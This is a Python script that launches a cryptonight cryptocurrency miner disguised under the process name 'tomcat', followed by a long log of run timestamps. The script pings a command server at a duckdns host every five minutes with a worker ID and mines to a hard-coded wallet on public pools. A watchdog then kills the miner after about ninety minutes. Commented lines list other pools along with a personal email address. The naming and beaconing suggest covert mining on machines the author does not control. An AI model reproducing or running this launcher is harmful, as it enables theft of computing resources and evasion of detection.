import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:06.904862
#2018-02-17 17:06:06.050394
#2018-02-17 18:54:05.167707
#2018-02-17 20:43:07.319216
#2018-02-17 22:30:04.367860
#2018-02-18 00:13:07.373485
#2018-02-18 02:05:06.355586
#2018-02-18 03:52:07.006684
#2018-02-18 05:41:04.822952
#2018-02-18 07:33:06.603472
#2018-02-18 09:21:05.384204
#2018-02-18 11:07:06.542225
#2018-02-18 12:54:03.534261
#2018-02-18 14:40:01.513167
#2018-02-18 16:29:06.104405
#2018-02-18 18:18:06.911649
#2018-02-18 20:04:07.689916
#2018-02-18 21:51:06.430833
#2018-02-18 23:41:06.976209
#2018-02-19 01:27:07.076604
#2018-02-19 03:15:04.372977
#2018-02-19 05:00:10.555380
#2018-02-19 06:46:07.450870
#2018-02-19 08:35:06.955333
#2018-02-19 10:24:06.870580
#2018-02-19 12:12:07.550636
#2018-02-19 14:00:14.861238
#2018-02-19 15:49:09.811764
#2018-02-19 17:37:04.055483
#2018-02-19 19:26:05.924482
#2018-02-19 21:14:07.694371
#2018-02-19 23:00:10.286587
#2018-02-20 00:43:06.169900
#2018-02-20 02:34:04.152428
#2018-02-20 04:23:06.870475
#2018-02-20 06:07:07.580196
#2018-02-20 07:52:05.712743
#2018-02-20 09:38:08.261357
#2018-02-20 11:23:08.461989
#2018-02-20 13:09:06.246559
#2018-02-20 14:53:04.557224
#2018-02-20 16:38:08.300067
#2018-02-20 18:26:01.815919
#2018-02-20 20:17:04.698707
#2018-02-20 22:03:05.036743
#2018-02-20 23:43:06.166346
#2018-02-21 01:28:04.326469
#2018-02-21 03:15:08.139394
#2018-02-21 05:04:08.020840
#2018-02-21 06:52:09.016902
#2018-02-21 08:38:08.203153
#2018-02-21 10:24:08.624510
#2018-02-21 12:11:07.090206
#2018-02-21 13:59:07.847783
#2018-02-21 15:43:01.635052
#2018-02-21 17:34:04.961136
#2018-02-21 19:21:05.293072
#2018-02-21 21:10:04.081935
#2018-02-21 22:56:04.148723
#2018-02-22 00:44:06.223291
#2018-02-22 02:33:05.651685
#2018-02-22 04:19:06.722301
#2018-02-22 06:06:07.207482
#2018-02-22 07:51:06.925424
#2018-02-22 09:39:07.162908
#2018-02-22 11:24:08.158147
#2018-02-22 13:11:06.323266
#2018-02-22 14:59:08.093591
#2018-02-22 16:44:01.656683
#2018-02-22 18:31:06.292743
#2018-02-22 20:23:04.146207
#2018-02-22 22:08:04.210369
#2018-02-22 23:54:04.420639
#2018-02-23 01:42:04.060753
#2018-02-23 03:28:05.177522
#2018-02-23 05:14:05.336634
#2018-02-23 06:59:01.371903
#2018-02-23 08:49:06.765792
#2018-02-23 11:09:07.660789
#2018-02-23 13:02:06.281572
#2018-02-23 14:47:01.832431
#2018-02-23 16:37:09.388223
#2018-02-23 18:23:05.995490
#2018-02-23 20:07:07.582468
#2018-02-23 21:58:01.457269
#2018-02-23 23:46:05.432580
#2018-02-24 01:38:07.909174
#2018-02-24 03:27:06.886290
#2018-02-24 05:13:01.236638
#2018-02-24 07:01:04.102178
#2018-02-24 08:36:01.743361
#2018-02-24 10:08:06.097987
#2018-02-24 11:51:07.258365
#2018-02-24 13:20:05.505039
#2018-02-24 14:51:03.820749
#2018-02-24 16:23:01.937658
#2018-02-24 16:24:01.395591
#2018-02-24 18:03:07.106422
#2018-02-24 19:32:07.232101
#2018-02-24 21:10:05.297851
#2018-02-24 23:12:03.534486
#2018-02-25 01:33:03.615836
#2018-02-25 05:02:07.523888
#2018-02-25 09:55:01.535120